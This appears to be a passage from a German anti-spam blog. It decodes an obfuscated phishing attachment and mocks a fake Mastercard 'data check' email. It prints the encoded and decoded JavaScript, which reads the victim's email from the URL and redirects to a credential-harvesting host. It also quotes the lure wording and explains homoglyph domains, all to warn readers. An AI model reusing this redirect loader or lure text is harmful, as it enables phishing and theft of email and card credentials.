      "%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%0A%3C%68%74%6D%6C%20%6C%61%6E%67%3D%22%65%6E%22%3E%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%63%6F%6E%74%65%6E%74%2D%74%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%55%54%46%2D%38%22%3E%0A%20%20%20%20%20%20%0A%0A%3C%64%69%76%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%0A%3C%66%6F%72%6D%20%6E%61%6D%65%3D%22%72%74%77%6F%64%6B%6C%70%22%3E%0A%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%68%69%64%64%65%6E%22%20%6E%61%6D%65%3D%22%64%65%6C%73%6B%6A%6D%22%20%73%69%7A%65%3D%22%33%35%22%20%76%61%6C%75%65%3D%22%22%3E%0A%3C%2F%66%6F%72%6D%3E%0A%3C%2F%64%69%76%3E%0A%0A%0A%3C%73%63%72%69%70%74%3E%0A%76%61%72%20%6C%6F%63%61%74%65%20%3D%20%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%0A%64%6F%63%75%6D%65%6E%74%2E%72%74%77%6F%64%6B%6C%70%2E%64%65%6C%73%6B%6A%6D%2E%76%61%6C%75%65%20%3D%20%6C%6F%63%61%74%65%0A%76%61%72%20%74%65%78%74%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%72%74%77%6F%64%6B%6C%70%2E%64%65%6C%73%6B%6A%6D%2E%76%61%6C%75%65%0A%0A%0A%0A%66%75%6E%63%74%69%6F%6E%20%64%65%6C%69%6E%65%61%74%65%28%73%74%72%29%7B%0A%0A%74%68%65%6C%65%66%74%20%3D%20%73%74%72%2E%69%6E%64%65%78%4F%66%28%22%23%22%29%20%2B%20%31%3B%0A%74%68%65%72%69%67%68%74%20%3D%20%73%74%72%2E%6C%61%73%74%49%6E%64%65%78%4F%66%28%22%3A%22%29%3B%0A%72%65%74%75%72%6E%28%73%74%72%2E%73%75%62%73%74%72%69%6E%67%28%74%68%65%6C%65%66%74%2C%20%74%68%65%72%69%67%68%74%29%29%3B%0A%7D%0A%73%65%74%54%69%6D%65%6F%75%74%28%66%75%6E%63%74%69%6F%6E%28%29%20%7B%0A%20%20%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%20%3D%20%22%68%74%74%70%73%3A%2F%2F%77%62%62%77%33%39%30%32%38%38%39%31%30%31%2E%75%73%2D%73%6F%75%74%68%2E%63%66%2E%61%70%70%64%6F%6D%61%69%6E%2E%63%6C%6F%75%64%2F%63%6F%6E%66%69%67%2F%74%6F%6B%65%6E%2F%3F%33%35%64%34%34%61%32%39%39%64%31%61%32%62%61%37%63%38%39%66%36%32%63%3D%22%20%2B%20%64%65%6C%69%6E%65%61%74%65%28%74%65%78%74%29%20%2B%20%22%26%30%30%30%39%79%79%65%69%6E%73%38%32%30%74%6E%74%49%44%3D%31%6B%62%72%33%38%38%77%6E%6A%33%66%36%35%61%63%63%2D%64%32%65%37%2D%30%39%38%75%2D%3A%6A%6E%73%64%6A%6A%38%38%39%30%30%30%77%30%22%3B%0A%7D%2C%20%30%30%30%30%29%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%2F%62%6F%64%79%3E%0A%0A%0A%3C%2F%68%74%6D%6C%3E%0A%0A"
    )
  );
</script>
$ _

[Ja, ich kann die gammelfleisch-Adresse ruhig über eine im Link enthaltene, eindeutige ID bestätigen. Diese Adresse liegt sowieso als Magnet für Spammer im Impressum und kann von jedem Idioten des Internet direkt mit einem Skript aus einer offenen Quelle ausgelesen werden. Mit einer Mailadresse, die ich von Spam freihalten will, würde ich das allerdings nicht machen. Es wäre sehr dumm.]

Ach, so macht man Websites heute. Man schreibt sein HTML-Markup nicht mehr einfach rein, sondern programmiert stattdeseen Javascript, damit ein Programm das HTML-Markup reinschreibt.

Kein Mensch hätte einen derartigen überumständlichen Mummenschanz nötig. Hier will ein krimineller Idiot automatische Analysen erschweren. Aber zum Glück gibt es dafür Abhilfe, wenn man das generierte HTML mal lesen will (Javascript muss dafür erlaubt werden). Ja, ich könnte das auch schnell selbst mit einem dieser erschröcklich anzuschauenden Perl-Einzeiler machen, aber die eben verlinkte Seite kann jeder Mensch benutzen. Vielleicht hat ja der eine oder andere Mitleser auch Interesse. 😉

Beim „Rückgängigmachen der Unlesbarmachung“ kommt folgendes HTML heraus:

<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
      

<div style="display: none;">
<form name="rtwodklp">
<input type="hidden" name="delskjm" size="35" value="">
</form>
</div>


<script>
var locate = window.location
document.rtwodklp.delskjm.value = locate
var text = document.rtwodklp.delskjm.value



function delineate(str){

theleft = str.indexOf("#") + 1;
theright = str.lastIndexOf(":");
return(str.substring(theleft, theright));
}
setTimeout(function() {
  window.location.href = "https://wbbw3902889101.us-south.cf.appdomain.cloud/config/token/?35d44a299d1a2ba7c89f62c=" + delineate(text) + "&0009yyeins820tntID=1kbr388wnj3f65acc-d2e7-098u-:jnsdjj889000w0";
}, 0000);
</script>
</head>
</body>


</html>

Auf so eine tolle Idee muss man auch erstmal kommen! Mit Javascript HTML generieren, das wiederum Javascript beinhaltet, das dann auf eine andere Adresse weiterleitet. Auf so eine Idee kommt nicht jeder. Dafür muss man schon eine vollständig ausgebrannte Blitzbirne sein. 💡

Übrigens: Wer einen Javascript-Blocker benutzt, kann auf Kriminelle, die ihre Absichten dermaßen trickreich vor automatischen Analysen verstecken, niemals hereinfallen. Tut das einfach, wenn es auch in den ersten Tagen ein bisschen unbequem sein kann, mit ein paar Klicks ein paar sinnvolle Ausnahmen zu konfigurieren. Danach hat man viel für seine Computersicherheit getan, und das kann schnell eine Menge Zeit, Geld und Ärger ersparen. 🛡️

Am Ende einiger weiterer Weiterleitungen landet man auf der folgenden Phishing-Website:

Die Zugangsdaten für die eigene Mailadresse, die man dort eingeben soll, gehen direkt an Kriminelle und werden für betrügerische Machenschaften unter fremder Identität benutzt. Das gilt übrigens auch, wenn man hinterher eine scheinbare Fehlermeldung der Marke „falsches Passwort“ angezeigt bekommt. 🙁

Und danach hat man den Schaden. 😫

Die Polizei ermittelt zunächst gegen den Inhaber der Mailadresse, und die Verbrecher bleiben in ihrer Anonymität und bekommen leider keinen längeren Aufenthalt im JVA-Hotel. Dass sie keine „verdächtige“ Freemailer-Adresse benutzen, gibt ihren Betrugsgeschäften sogar noch eine höhere Seriosität und ermöglicht ihnen, einen noch größeren Schaden anzurichten.

Ach ja, die eigene Mailadresse ist danach natürlich auch verbrannt.

Regard

Email Admin 2020 | All rights reserved.

Diese Spam wurde mechanisch erstellt und ist ohne Unterschrift gültig. Natürlich mit proklamierten „geistigen Eigentum“ auf mechanischen Output. 🤡

Unbestätigter Benachrichtigungskanal

Donnerstag, 25. Juni 2020

Abt.: Einmal das übliche, miese Phishing 🎣

Von: Team Mastercard <ulleinh@ul-base.de>

So so, „Team Mastercard“. Gerade so das Kinderkunststück hinbekommen, die Absenderadresse zu fälschen, aber es nicht einmal überzeugend machen. Typisch Spammer!

Sehr geehrte Kundin, sehr geehrter Kunde,

Stimmt, eines der beiden Geschlechter haben Menschen meistens. Wer seine Kunden behalten will, wird sie trotzdem persönlich ansprechen, statt sie mit maximal unpersönlichen Phrasen zu verachten. Aber hier schreibt ja auch nicht „Mastercard“, hier schreibt ein Betrüger, der naive Menschen dazu bringen will, dass sie ihm Vollzugriff auf die Kreditkarte geben. 💳💸

Ihre Karte wurde mit sofortiger Wirkung eingefroren.

Aber die liegt doch gar nicht im Kühlfach. ❄️

Bis zur Klärung des Falles können Sie keine Zahlungen mehr tätigen außerdem werden bereits getätigte Zahlungen ebenfalls eingefroren.

Hach, der Beistrich ist ein schwieriges Ding, doch das Einfrieren fällt so leicht. Und nicht nur der Beistrich, heute gemeinhin als „Komma“ bezeichnet, ist eine schwierige Sache für unstrukturiert denkende Betrüger aus der dritten Verbrechensliga, auch…

Ihre Karte wurde für einen Datencheck ausgewählt Sie haben eine unbestätigte E-Mail Adresse in Ihrem Konto hinterlegt.

…der Punkt am Ende eines Satzes macht so seine lieben Probleme. Vom…

Mit einem unbestätigtem Benachrichtigungskanal kann nicht gewährleistet werden, dass Sie alle relevanten in Bezug auf Ihre Karte erhalten.

…Sinn in den Wörtern will ich gar nicht erst anfangen, wenn ich von allen relevanten in Bezug lese. 😫

Was steht hier? Hier steht, dass man selbst oder jemand anders eine Mailadresse zu einem Konto geändert hat. Und wenn das geschieht, dann kommt dieses angebliche Mastercard aus der kranken Phantasie der Spammer und Betrüger und bittet seine Kunden darum…

Bitte unterziehen Sie sich umgehend dem Datencheck und führen Sie ebenfalls einen Datenabgleich durch um Ihre Karte wieder freizuschalten. Tun Sie dies nicht wird Ihr Konto geschlossen und wir erheben eine Kontoschließungsgebühr in Höhe von 29.95 EUR.

zum Formular

…entweder sofort, unmittelbar und dringend wie die Deppen in eine E-Mail zu klicken oder grundlos dreißig Øre zu bezahlen und einen Haufen weiterer Probleme zu haben, weil das Konto geschlossen ist und auch vergangene Zahlungen keine richtigen Zahlungen waren. 🥊

Der Link führt natürlich nicht auf eine Website in der Domain von Mastercard, sondern in die Domain rhinopctec (punkt) com, die nichts mit Mastercard zu tun hat. Diese Spam ist ein Zustecksel eines Lesers, und der Link enthielt eine eindeutige ID, so dass ich mir nicht anschauen mochte, was dort kommt, aber typischerweise darf man in einem mehrschrittigen Verfahren…

…seine Login-Daten angeben; und
…diverse Daten angeben, die Mastercard schon lange kennt und die deshalb überhaupt nichts „bestätigen“.

Alles, was man dort eingibt, geht direkt an Betrüger. Mit dem angerichteten Schaden und dem Identitätsmissbrauch hat man jahrelangen Ärger. 🙁

Zum Glück gibt es ein einfaches und hundertprozentig wirksames Mittel gegen Phishing: Niemals in eine E-Mail klicken. Wenn man die Websites über ein Lesezeichen seines Webbrowsers aufruft, kann einem kein Verbrecher einen giftigen Link unterschieben. Macht das! Es kostet nichts und kann schnell tausende von Euro sparen. So eine Phishing-Spam kann deutlich besser sein als dieses Exemplar. Ich habe PayPal-Phishing mit namentlicher Ansprache des Empfängers und in fehlerfreiem Deutsch gesehen, und der Link ging auf eine Punycode-Domain mit Unicode-Zeichen, die den lateinischen Buchstaben der Original-Domain zum Verwechseln ähnlich sahen. Oder sieht hier jemand auf dem ersten Blick den Unterschied zwischen „Mastercard“ und „Маstеrсard“? 🔎

Wer den Unterschied nicht sieht (also vermutlich fast jeder Leser): „Маstеrсard“ enthält vier kyrillische Buchstaben. Und das geht auch mit Domains. Niemand kommt bei so dermaßen gut vergifteten Giftlinks auf den Verdacht, dass es Phishing sein könnte. Wer weiter forschen möchte, kann ja mal versuchen, herauszubekommen, welches der beiden „Маstеrсard“ die vier kyrillischen Buchstaben enthält. Es ist nur eines. Ja, die beiden Wörter sind wirklich verschieden. 🕵️

Und wenn es Bestandteile von Domainnamen wären, würden sie zu zwei völlig verschiedenen Websites führen, ohne dass das – wisst schon: Benutzerfreundlichkeit – leicht erkennbar wäre. 🍄

Und deshalb klickt man niemals, niemals, niemals in E-Mails. 😉

Wir danken Ihnen für Ihre Mithilfe und bitten um Ihr Verständnis.

Oh, so viel pseudohöflicher „Dank“ für Nichts, nachdem man mit Androhungen von Kosten und teuren Folgen zum Klicken quasi gezwungen wurde! 🤮

Mit freundlichen Grüßen,
Ihr Mastercard-Team

Freundlich wie eine Ohrfeige
Ein mieser Phishing-Spammer

Diese Spam ist ein Zustecksel meines Lesers A. H.